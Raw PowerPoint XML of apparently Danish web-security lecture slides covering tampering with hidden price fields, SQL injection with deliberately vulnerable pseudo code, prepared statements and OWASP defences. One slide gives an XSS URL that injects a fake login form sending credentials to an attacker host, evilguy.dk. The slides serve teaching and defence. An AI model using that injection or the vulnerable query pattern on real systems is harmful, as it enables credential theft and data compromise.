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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="358" r:id="rId2"/>
    <p:sldId id="385" r:id="rId3"/>
    <p:sldId id="392" r:id="rId4"/>
    <p:sldId id="366" r:id="rId5"/>
    <p:sldId id="367" r:id="rId6"/>
    <p:sldId id="368" r:id="rId7"/>
    <p:sldId id="369" r:id="rId8"/>
    <p:sldId id="370" r:id="rId9"/>
    <p:sldId id="383" r:id="rId10"/>
    <p:sldId id="371" r:id="rId11"/>
    <p:sldId id="372" r:id="rId12"/>
    <p:sldId id="380" r:id="rId13"/>
    <p:sldId id="373" r:id="rId14"/>
    <p:sldId id="378" r:id="rId15"/>
    <p:sldId id="374" r:id="rId16"/>
    <p:sldId id="379" r:id="rId17"/>
    <p:sldId id="375" r:id="rId18"/>
    <p:sldId id="376" r:id="rId19"/>
    <p:sldId id="377" r:id="rId20"/>
    <p:sldId id="395" r:id="rId21"/>
    <p:sldId id="391" r:id="rId22"/>
    <p:sldId id="362" r:id="rId23"/>
    <p:sldId id="363" r:id="rId24"/>
    <p:sldId id="361" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="386" r:id="rId27"/>
    <p:sldId id="365" r:id="rId28"/>
    <p:sldId id="387" r:id="rId29"/>
    <p:sldId id="393" r:id="rId30"/>
    <p:sldId id="390" r:id="rId31"/>
    <p:sldId id="394" r:id="rId32"/>
    <p:sldId id="396" r:id="rId33"/>
    <p:sldId id="389" r:id="rId3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9" autoAdjust="0"/>
    <p:restoredTop sz="86377" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-912" y="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43BED-F66B-414C-999C-6DB97E9C9F9B}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>07/03/16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98751-1623-764B-BC39-A3746FBF2F7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7310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07/03/16</a:t>
            </a:fld>
            <a:endParaRPr lang="da-DK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07/03/16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07/03/16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 userDrawn="1"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134" tIns="42067" rIns="84134" bIns="42067"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2" y="1200324"/>
            <a:ext cx="6900755" cy="3168687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7189" y="4468599"/>
            <a:ext cx="6982068" cy="717493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Overskrift</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0"/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5194507"/>
            <a:ext cx="6982220" cy="1369537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="84134" tIns="42067" rIns="84134" bIns="42067"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 smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>autem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> vel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>eum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>iriure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>dolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> in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5541" y="9991"/>
            <a:ext cx="2152751" cy="8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5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07/03/16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07/03/16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07/03/16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07/03/16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07/03/16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07/03/16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07/03/16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07/03/16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FD1E4D-6B93-4EE9-8A10-B8AD336451E2}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:pPr/>
              <a:t>07/03/16</a:t>
            </a:fld>
            <a:endParaRPr lang="da-DK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9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stasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+before+proceeding:%3Cform+action=%22http://evilguy.dk/log.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type=text+length=20+name=login%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type=text+length=20+name=pw%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type=submit+value=LOGIN%3E%3C/form%3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1037188" y="4468599"/>
            <a:ext cx="7423243" cy="717493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Web Security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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037037" y="5194507"/>
            <a:ext cx="7281355" cy="1369537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>Understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> on web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> systems. SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>, XSS, session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>hijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Tekstfelt 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866879" y="6379928"/>
            <a:ext cx="1259953" cy="346566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="84134" tIns="42067" rIns="84134" bIns="42067" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="BFBFBF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BFBFBF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Becher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308553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 Tampering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NEVER trust data from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>	- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> ALL data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receive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> – online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>purchase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>tickets</a:t>
            </a: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The web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>unless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>ticketprice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> input is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>checked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Programmers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> store data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>strange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>places</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…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57290" y="3631172"/>
            <a:ext cx="5711820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&lt;input type="hidden" name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ticketprice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>" value=“780"&gt;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357290" y="4131238"/>
            <a:ext cx="5711820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&lt;input type="hidden" name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ticketprice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>" value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>70</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1357290" y="3815838"/>
            <a:ext cx="1588" cy="500066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32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Lets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(pseudo code)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Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> a smal system vulnerable to SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a: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pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>gain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> info…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5852" y="2500306"/>
            <a:ext cx="6572296" cy="32932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sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(”password”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = ”SELECT  FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> WHERE password=”+p;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>stmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>rs.next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Deny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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84894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 - Prepared statement</a:t>
            </a:r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060848"/>
            <a:ext cx="9062898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endParaRPr lang="da-DK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a-DK" sz="16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link = new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mysqli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", "", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" b="1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da-DK" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mydb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="16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da-DK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a-DK" sz="16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a-DK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($link-&gt;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connect_error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da-DK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a-DK" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  die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('Connect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 ('.$link-&gt;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connect_errno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.') '.$link-&gt;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connect_error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da-DK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a-DK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da-DK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a-DK" sz="16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da-DK" sz="1600" b="1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da-DK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"SELECT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desc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pyear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FROM products";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$stmt = $link-&gt;prepare($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bind_result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desc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pyear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$stmt-&gt;execute();</a:t>
            </a:r>
          </a:p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while($stmt-&gt;fetch()){		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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echo '('.$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pyear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.') : '.$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desc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.'&lt;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/&gt;';	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endParaRPr lang="en-GB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937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now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>???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How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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>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application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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9360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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>defenses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3 options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> Statements (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Parameterized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> Procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> all User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Read:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>SQL_Injection_Prevention_Cheat_Sheet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80129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Parameterized Queries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First: Developer defines all the SQL code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
